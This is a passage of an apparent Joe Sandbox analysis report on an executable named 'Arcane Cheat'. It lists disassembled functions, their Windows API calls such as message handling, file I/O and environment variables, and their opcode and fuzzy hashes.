                                  control_flow_graph 999 83ac74-83ac8d PeekMessageW 1000 83acc8-83accc 999->1000 1001 83ac8f-83aca3 GetMessageW 999->1001 1002 83aca5-83acb2 IsDialogMessageW 1001->1002 1003 83acb4-83acc2 TranslateMessage DispatchMessageW 1001->1003 1002->1000 1002->1003 1003->1000
                                  APIs
                                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0083AC85
                                  • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0083AC96
                                  • IsDialogMessageW.USER32(00010450,?), ref: 0083ACAA
                                  • TranslateMessage.USER32(?), ref: 0083ACB8
                                  • DispatchMessageW.USER32(?), ref: 0083ACC2
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1732479560.0000000000821000.00000020.00000001.01000000.00000008.sdmp, Offset: 00820000, based on PE: true
                                  • Associated: 00000003.00000002.1732451379.0000000000820000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732519930.0000000000853000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.000000000085E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000864000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000881000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732618648.0000000000882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_820000_Arcane Cheat.jbxd
                                  Similarity
                                  • API ID: Message$DialogDispatchPeekTranslate
                                  • String ID:
                                  • API String ID: 1266772231-0
                                  • Opcode ID: 65bd48f7ce20186a00eeb77b611fc67e0edb67b5d8e5f552a4b88c0d851c08ff
                                  • Instruction ID: 237a4d2a29d3f86c3eb2649a8a8b623a797d4539541abfb90b5e367fbe1a9d76
                                  • Opcode Fuzzy Hash: 65bd48f7ce20186a00eeb77b611fc67e0edb67b5d8e5f552a4b88c0d851c08ff
                                  • Instruction Fuzzy Hash: 47F0D071D02129AB8B209BE5DC4CDEB7FACFF052917404515F919D2110EB34D506CBF1
                                  Function 0083A2C7 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 36COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1004 83a2c7-83a2e6 GetClassNameW 1005 83a2e8-83a2fd call 8317ac 1004->1005 1006 83a30e-83a310 1004->1006 1011 83a2ff-83a30b FindWindowExW 1005->1011 1012 83a30d 1005->1012 1008 83a312-83a315 SHAutoComplete 1006->1008 1009 83a31b-83a31f 1006->1009 1008->1009 1011->1012 1012->1006
                                  APIs
                                  • GetClassNameW.USER32(?,?,00000050), ref: 0083A2DE
                                  • SHAutoComplete.SHLWAPI(?,00000010), ref: 0083A315
                                    • Part of subcall function 008317AC: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000117AC,0082BB05,00000000,.exe,?,?,00000800,?,?,008385DF,?), ref: 008317C2
                                  • FindWindowExW.USER32(?,00000000,EDIT,00000000), ref: 0083A305
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1732479560.0000000000821000.00000020.00000001.01000000.00000008.sdmp, Offset: 00820000, based on PE: true
                                  • Associated: 00000003.00000002.1732451379.0000000000820000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732519930.0000000000853000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.000000000085E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000864000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000881000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732618648.0000000000882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_820000_Arcane Cheat.jbxd
                                  Similarity
                                  • API ID: AutoClassCompareCompleteFindNameStringWindow
                                  • String ID: EDIT
                                  • API String ID: 4243998846-3080729518
                                  • Opcode ID: 74b21d27d6a60eea48ea7fb9ea58d21d82ed3fff6aa9a3e71f3afe7630d41dc4
                                  • Instruction ID: cbc968d91a82ac8e6ff7991bb2eaa4c49d2a56e0c199006a6c7de47dfcb853b7
                                  • Opcode Fuzzy Hash: 74b21d27d6a60eea48ea7fb9ea58d21d82ed3fff6aa9a3e71f3afe7630d41dc4
                                  • Instruction Fuzzy Hash: 2AF0A732A0162877E73096689C09FEB77ACFF86B11F440156BE45E2280D760AD45C6F7
                                  Function 0083D287 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 32COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1013 83d287-83d2b2 call 83e360 SetEnvironmentVariableW call 82fbd8 1017 83d2b7-83d2bb 1013->1017 1018 83d2df-83d2e3 1017->1018 1019 83d2bd-83d2c1 1017->1019 1020 83d2ca-83d2d1 call 82fcf1 1019->1020 1023 83d2c3-83d2c9 1020->1023 1024 83d2d3-83d2d9 SetEnvironmentVariableW 1020->1024 1023->1020 1024->1018
                                  APIs
                                  • SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 0083D29D
                                  • SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 0083D2D9
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1732479560.0000000000821000.00000020.00000001.01000000.00000008.sdmp, Offset: 00820000, based on PE: true
                                  • Associated: 00000003.00000002.1732451379.0000000000820000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732519930.0000000000853000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.000000000085E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000864000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000881000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732618648.0000000000882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_820000_Arcane Cheat.jbxd
                                  Similarity
                                  • API ID: EnvironmentVariable
                                  • String ID: sfxcmd$sfxpar
                                  • API String ID: 1431749950-3493335439
                                  • Opcode ID: db7a66dce7a8e979a5e1648b984840e30a5671c2ef560a5d231f31747895d24d
                                  • Instruction ID: eaf956ce3516680ce0be95702f35704de20cca0c8230d7728c795926878005cb
                                  • Opcode Fuzzy Hash: db7a66dce7a8e979a5e1648b984840e30a5671c2ef560a5d231f31747895d24d
                                  • Instruction Fuzzy Hash: 41F0A771801738A7DB202F94AC19EFA7768FF09B93F000121FD44D6281D664DD40DAF1
                                  Function 0082984E Relevance: 6.1, APIs: 4, Instructions: 57fileCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1025 82984e-82985a 1026 829867-82987e ReadFile 1025->1026 1027 82985c-829864 GetStdHandle 1025->1027 1028 829880-829889 call 829989 1026->1028 1029 8298da 1026->1029 1027->1026 1033 8298a2-8298a6 1028->1033 1034 82988b-829893 1028->1034 1031 8298dd-8298e2 1029->1031 1036 8298b7-8298bb 1033->1036 1037 8298a8-8298b1 GetLastError 1033->1037 1034->1033 1035 829895 1034->1035 1038 829896-8298a0 call 82984e 1035->1038 1040 8298d5-8298d8 1036->1040 1041 8298bd-8298c5 1036->1041 1037->1036 1039 8298b3-8298b5 1037->1039 1038->1031 1039->1031 1040->1031 1041->1040 1043 8298c7-8298d0 GetLastError 1041->1043 1043->1040 1045 8298d2-8298d3 1043->1045 1045->1038
                                  APIs
                                  • GetStdHandle.KERNEL32(000000F6), ref: 0082985E
                                  • ReadFile.KERNELBASE(?,?,00000001,?,00000000), ref: 00829876
                                  • GetLastError.KERNEL32 ref: 008298A8
                                  • GetLastError.KERNEL32 ref: 008298C7
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1732479560.0000000000821000.00000020.00000001.01000000.00000008.sdmp, Offset: 00820000, based on PE: true
                                  • Associated: 00000003.00000002.1732451379.0000000000820000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732519930.0000000000853000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.000000000085E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000864000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000881000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732618648.0000000000882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_820000_Arcane Cheat.jbxd
                                  Similarity
                                  • API ID: ErrorLast$FileHandleRead
                                  • String ID:
                                  • API String ID: 2244327787-0
                                  • Opcode ID: 2fc07ffc882ccfbf2f697315decb64b23166b102c6014b1f932832936a6ecf25
                                  • Instruction ID: c47005aa0c168dbacd0f81cbad16a5364984d11e73bd73a6b8a8a16c8b526ed7
                                  • Opcode Fuzzy Hash: 2fc07ffc882ccfbf2f697315decb64b23166b102c6014b1f932832936a6ecf25
                                  • Instruction Fuzzy Hash: A0118630900728EFDB205B65E80497A77ACFB07771F18853AF8AAC5990E7359DC09F62
                                  Function 0084A4F4 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  • LoadLibraryExW.KERNELBASE(00000000,00000000,00000800,00843713,00000000,00000000,?,0084A49B,00843713,00000000,00000000,00000000,?,0084A698,00000006,FlsSetValue), ref: 0084A526
                                  • GetLastError.KERNEL32(?,0084A49B,00843713,00000000,00000000,00000000,?,0084A698,00000006,FlsSetValue,00857348,00857350,00000000,00000364,?,00849077), ref: 0084A532
                                  • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0084A49B,00843713,00000000,00000000,00000000,?,0084A698,00000006,FlsSetValue,00857348,00857350,00000000), ref: 0084A540
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1732479560.0000000000821000.00000020.00000001.01000000.00000008.sdmp, Offset: 00820000, based on PE: true
                                  • Associated: 00000003.00000002.1732451379.0000000000820000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732519930.0000000000853000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.000000000085E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000864000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000881000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732618648.0000000000882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_820000_Arcane Cheat.jbxd
                                  Similarity
                                  • API ID: LibraryLoad$ErrorLast
                                  • String ID:
                                  • API String ID: 3177248105-0
                                  • Opcode ID: 71f176c53f56e540ee825f03f8f1f198249286f18a9e78a6cd157fb2ed441bc0
                                  • Instruction ID: d0d4082de4cf9a1da5173fec8aa5e881ea912dddcd9bdb1fcf62200c2dc0cb35
                                  • Opcode Fuzzy Hash: 71f176c53f56e540ee825f03f8f1f198249286f18a9e78a6cd157fb2ed441bc0
                                  • Instruction Fuzzy Hash: 4001FC3269172AABC7258AB89C44A56BB5CFF45BA27120521F90ADB140D725D900C6D1
                                  Function 00829F2F Relevance: 4.6, APIs: 3, Instructions: 107fileCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetStdHandle.KERNEL32(000000F5,?,00000001,?,?,0082CC94,00000001,?,?,?,00000000,00834ECD,?,?,?), ref: 00829F4C
                                  • WriteFile.KERNEL32(?,?,?,00000000,00000000,?,?,00000000,00834ECD,?,?,?,?,?,00834972,?), ref: 00829F8E
                                  • WriteFile.KERNELBASE(?,?,?,00000000,00000000,?,?,?,00000001,?,?,0082CC94,00000001,?,?), ref: 00829FB8
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1732479560.0000000000821000.00000020.00000001.01000000.00000008.sdmp, Offset: 00820000, based on PE: true
                                  • Associated: 00000003.00000002.1732451379.0000000000820000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732519930.0000000000853000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.000000000085E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000864000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000881000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732618648.0000000000882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_820000_Arcane Cheat.jbxd
                                  Similarity
                                  • API ID: FileWrite$Handle
                                  • String ID:
                                  • API String ID: 4209713984-0
                                  • Opcode ID: aa12a78935b7f5605725f03711edbc450b5bc4abc4df070a4ec073984f94d0be
                                  • Instruction ID: f686eb6965b0d0c80117f1942cdea595e22e0f7a888958cec44871a12ef14aa7
                                  • Opcode Fuzzy Hash: aa12a78935b7f5605725f03711edbc450b5bc4abc4df070a4ec073984f94d0be
                                  • Instruction Fuzzy Hash: FE3124312087259BDF548F24EA48B6ABBA8FF50751F04455CF985DB281CB74DD88CBA2
                                  Function 0082A207 Relevance: 4.6, APIs: 3, Instructions: 56COMMON
                                  Download Yara Rule
                                  APIs
                                  • CreateDirectoryW.KERNELBASE(?,00000000,?,?,?,0082A113,?,00000001,00000000,?,?), ref: 0082A22E
                                  • CreateDirectoryW.KERNEL32(?,00000000,?,?,00000800,?,?,?,?,0082A113,?,00000001,00000000,?,?), ref: 0082A261
                                  • GetLastError.KERNEL32(?,?,?,?,0082A113,?,00000001,00000000,?,?), ref: 0082A27E
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1732479560.0000000000821000.00000020.00000001.01000000.00000008.sdmp, Offset: 00820000, based on PE: true
                                  • Associated: 00000003.00000002.1732451379.0000000000820000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732519930.0000000000853000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.000000000085E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000864000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000881000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732618648.0000000000882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_820000_Arcane Cheat.jbxd
                                  Similarity
                                  • API ID: CreateDirectory$ErrorLast
                                  • String ID:
                                  • API String ID: 2485089472-0
                                  • Opcode ID: 11fa5853abc7a436b459cdf85148b46237f782611ab23df9d145fb9dc55671c4
                                  • Instruction ID: 2e4ef9b2976de32eaa6ccd52e92e5b443bce1740a008e04f2e761caafe1ce916
                                  • Opcode Fuzzy Hash: 11fa5853abc7a436b459cdf85148b46237f782611ab23df9d145fb9dc55671c4
                                  • Instruction Fuzzy Hash: 69019231141678E7DB3AAB68AC05BEE3349FF06B92F144451F901E6091D766CAC186A7
                                  Function 0084AFF4 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 132COMMON
                                  Download Yara Rule
                                  APIs
                                  • GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 0084B019
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1732479560.0000000000821000.00000020.00000001.01000000.00000008.sdmp, Offset: 00820000, based on PE: true
                                  • Associated: 00000003.00000002.1732451379.0000000000820000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732519930.0000000000853000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.000000000085E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000864000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000881000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732618648.0000000000882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_820000_Arcane Cheat.jbxd
                                  Similarity
                                  • API ID: Info
                                  • String ID:
                                  • API String ID: 1807457897-3916222277
                                  • Opcode ID: e7ae45c410d68f0f71876f7f89c9f83c7f8fe28f1ec6e2dcdc9dfad38749e565
                                  • Instruction ID: da3025a649b4c75f40c2a987ab2241f5aa026ffbac0a374bc50b0d4c62ecbda9
                                  • Opcode Fuzzy Hash: e7ae45c410d68f0f71876f7f89c9f83c7f8fe28f1ec6e2dcdc9dfad38749e565
                                  • Instruction Fuzzy Hash: 1A41147050478CABDB228A288C94AEABBA9FB45308F1404EDE59AC7142E335DA45DF20
                                  Function 0084A72C Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47COMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,3FE85006,00000001,?,?), ref: 0084A79D
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1732479560.0000000000821000.00000020.00000001.01000000.00000008.sdmp, Offset: 00820000, based on PE: true
                                  • Associated: 00000003.00000002.1732451379.0000000000820000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732519930.0000000000853000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.000000000085E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000864000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000881000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732618648.0000000000882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_820000_Arcane Cheat.jbxd
                                  Similarity
                                  • API ID: String
                                  • String ID: LCMapStringEx
                                  • API String ID: 2568140703-3893581201
                                  • Opcode ID: e894e86f2a04f99c5eb5fe3f91db842f210221da4e16e7b53c27204899690d46
                                  • Instruction ID: 77b972559aa476f52ed884605d3bf91cbfc19c6d7ef2c721fd3b4ebfc209e947
                                  • Opcode Fuzzy Hash: e894e86f2a04f99c5eb5fe3f91db842f210221da4e16e7b53c27204899690d46
                                  • Instruction Fuzzy Hash: 7D01483254020CBBCF165FA4DC02DEE3F66FF08765F408154FE14A9260CA368A31EB92
                                  Function 0084A6CA Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 34COMMON
                                  Download Yara Rule
                                  APIs
                                  • InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,00849D2F), ref: 0084A715
                                  Strings
                                  • InitializeCriticalSectionEx, xrefs: 0084A6E5
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1732479560.0000000000821000.00000020.00000001.01000000.00000008.sdmp, Offset: 00820000, based on PE: true
                                  • Associated: 00000003.00000002.1732451379.0000000000820000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732519930.0000000000853000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.000000000085E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000864000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000881000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732618648.0000000000882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_820000_Arcane Cheat.jbxd
                                  Similarity
                                  • API ID: CountCriticalInitializeSectionSpin
                                  • String ID: InitializeCriticalSectionEx
                                  • API String ID: 2593887523-3084827643
                                  • Opcode ID: 92662848e29ca4f1e5ff050af900a2e9dd98fa14b237749662fa700e596c2ec6
                                  • Instruction ID: f41dc866c602fd533eda89342aec49e2d3e17ab6ca7783ccce106f3d959bcca1
                                  • Opcode Fuzzy Hash: 92662848e29ca4f1e5ff050af900a2e9dd98fa14b237749662fa700e596c2ec6
                                  • Instruction Fuzzy Hash: 84F0BE3168520CBBCB156F64DC06CAEBFA1FF54762B808094FC199A360DA764A10EB92
                                  Function 0084A56F Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 30memoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1732479560.0000000000821000.00000020.00000001.01000000.00000008.sdmp, Offset: 00820000, based on PE: true
                                  • Associated: 00000003.00000002.1732451379.0000000000820000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732519930.0000000000853000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.000000000085E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000864000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000881000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732618648.0000000000882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_820000_Arcane Cheat.jbxd
                                  Similarity
                                  • API ID: Alloc
                                  • String ID: FlsAlloc
                                  • API String ID: 2773662609-671089009
                                  • Opcode ID: 9e8aea62fd18f5e4867a5a9ff75afaf990264eef8cd77cff798afb80b08636aa
                                  • Instruction ID: 236c75495e992b58cf9d7969626f4c43c9d7ffa0c314935d200a50816f95c21d
                                  • Opcode Fuzzy Hash: 9e8aea62fd18f5e4867a5a9ff75afaf990264eef8cd77cff798afb80b08636aa
                                  • Instruction Fuzzy Hash: 11E0553078532C6B86186FA49C028AEBB90FB24723B814098FC05DB340DD780F00D6D6
                                  Function 0084329A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 22COMMON
                                  Download Yara Rule
                                  APIs
                                  • try_get_function.LIBVCRUNTIME ref: 008432AF
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1732479560.0000000000821000.00000020.00000001.01000000.00000008.sdmp, Offset: 00820000, based on PE: true
                                  • Associated: 00000003.00000002.1732451379.0000000000820000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732519930.0000000000853000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.000000000085E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000864000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000881000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732618648.0000000000882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_820000_Arcane Cheat.jbxd
                                  Similarity
                                  • API ID: try_get_function
                                  • String ID: FlsAlloc
                                  • API String ID: 2742660187-671089009
                                  • Opcode ID: adf8bd8c1bb862485e455d1d7c1ea0c78e3245ea1e9a485ac8472cdc8a44ff2f
                                  • Instruction ID: 5ea08520de260ce4c8cbc736aba79eb9076c68ca37c16a6e88b445436defab2f
                                  • Opcode Fuzzy Hash: adf8bd8c1bb862485e455d1d7c1ea0c78e3245ea1e9a485ac8472cdc8a44ff2f
                                  • Instruction Fuzzy Hash: 3CD02B21780B786A811032D46C13AAE7FC4F701FF3F450152FE08DA382E5A9450102C6
                                  Function 0083E1F9 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                  Download Yara Rule
                                  APIs
                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0083E20B
                                    • Part of subcall function 0083DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0083DFD6
                                    • Part of subcall function 0083DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0083DFE7
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1732479560.0000000000821000.00000020.00000001.01000000.00000008.sdmp, Offset: 00820000, based on PE: true
                                  • Associated: 00000003.00000002.1732451379.0000000000820000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732519930.0000000000853000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.000000000085E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000864000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000881000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732618648.0000000000882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_820000_Arcane Cheat.jbxd
                                  Similarity
                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                  • String ID: 3To
                                  • API String ID: 1269201914-245939750
                                  • Opcode ID: d2cd2c8ef8a7aba84efeaf92932ac1e868520d9071251bac5b8c4f014d0e95f9
                                  • Instruction ID: c01530e5dca25ed70a48a8395b147f785240316b20ee8783b2f86c74524b080e
                                  • Opcode Fuzzy Hash: d2cd2c8ef8a7aba84efeaf92932ac1e868520d9071251bac5b8c4f014d0e95f9
                                  • Instruction Fuzzy Hash: 54B012E126E1027D320C2145BD0FC37031CF4C0B51730801AB615D80C09A405C0D4073
                                  Function 0084B350 Relevance: 3.2, APIs: 2, Instructions: 168COMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 0084AF1B: GetOEMCP.KERNEL32(00000000,?,?,0084B1A5,?), ref: 0084AF46
                                  • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,0084B1EA,?,00000000), ref: 0084B3C4
                                  • GetCPInfo.KERNEL32(00000000,0084B1EA,?,?,?,0084B1EA,?,00000000), ref: 0084B3D7
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1732479560.0000000000821000.00000020.00000001.01000000.00000008.sdmp, Offset: 00820000, based on PE: true
                                  • Associated: 00000003.00000002.1732451379.0000000000820000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732519930.0000000000853000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.000000000085E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000864000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000881000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732618648.0000000000882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_820000_Arcane Cheat.jbxd
                                  Similarity
                                  • API ID: CodeInfoPageValid
                                  • String ID:
                                  • API String ID: 546120528-0
                                  • Opcode ID: adf3311fb6252ea8191b487292f7506fa70febf2ea7cfcfa1afb73f14053e5c9
                                  • Instruction ID: 6e248876fbff39d900da385426438f5264bc4949d5b9e86011df46c3887601ce
                                  • Opcode Fuzzy Hash: adf3311fb6252ea8191b487292f7506fa70febf2ea7cfcfa1afb73f14053e5c9
                                  • Instruction Fuzzy Hash: FC5134B0A0030D9EDB288F75C8816BABBE5FF54314F1880AED096CB253D739D946CB95
                                  Function 00821385 Relevance: 3.1, APIs: 2, Instructions: 97COMMON
                                  Download Yara Rule
                                  APIs
                                  • __EH_prolog.LIBCMT ref: 00821385
                                    • Part of subcall function 00826057: __EH_prolog.LIBCMT ref: 0082605C
                                    • Part of subcall function 0082C827: __EH_prolog.LIBCMT ref: 0082C82C
                                    • Part of subcall function 0082C827: new.LIBCMT ref: 0082C86F
                                    • Part of subcall function 0082C827: new.LIBCMT ref: 0082C893
                                  • new.LIBCMT ref: 008213FE
                                    • Part of subcall function 0082B07D: __EH_prolog.LIBCMT ref: 0082B082
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1732479560.0000000000821000.00000020.00000001.01000000.00000008.sdmp, Offset: 00820000, based on PE: true
                                  • Associated: 00000003.00000002.1732451379.0000000000820000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732519930.0000000000853000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.000000000085E000.00000004.00000001.01000000.00000008.sdmpDownload File
